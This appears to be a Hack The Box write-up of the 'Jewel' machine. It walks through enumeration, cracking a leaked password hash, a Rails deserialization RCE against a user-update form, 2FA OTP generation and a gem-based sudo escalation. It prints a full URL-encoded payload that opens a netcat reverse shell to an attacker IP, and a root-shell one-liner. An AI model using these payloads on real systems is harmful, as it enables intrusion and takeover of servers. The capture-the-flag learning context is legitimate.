Scanning
We found port 22 for ssh and port 8000,8080 for HTTP where port 8000
Let`s add jewel.htb in our hosts
Enumeration
Port 8000
port 8080
Let`s enumerate the BLOG!
We found 2 user Bill,Jennifer
Let`s enumerate the REPO
After some enumerating i found SQL file "bd.sql" and i got some hashes
I cracked Bill hash "spongebob" but couldn`t login, let`s countinue enumeration
User flag
It`s using ruby '2.5.5' , let`s search for an exploit
After searching i found a CVE
I tested all the fields and i found that the vulnerable input in updating user fields
Payload
%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22U%60rm+%2Ftmp%2Ff%3Bmkfifo%20%2ftmp%2ff%3bcat%20%2ftmp%2ff%7c%2fbin%2fsh+-i+2%3e%261%7cnc+10.10.XX.XX+9001+%3e%2Ftmp%2ff%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T
Change the ip to your ip
$ su bill Password: bill@jewel:~$ whoami bill
The password is "spongebob" we cracked it if you remember
Let`s upgrade our shell
Root flag
I listed the directory as 1st step of enumeration and i found Google auth, it look like the admin use 2FA
Let`s get the secret key and use google auth
Let`s generate the OTP
Let`s use the OTP
Looks like something wrong.
This step made my mind blow off , i searched a lot and asked for a nudge at HTB discord server
Someone told me it`s about sync with the victim box, let`s see
.
Timezone is different, let`s set our machine to the victim timezone
Let`s try to escalate privilege again
Bam ! it`s working
sudo gem open -e "/bin/sh -c /bin/sh" rdoc
Thanks for reading i hope you enjoyed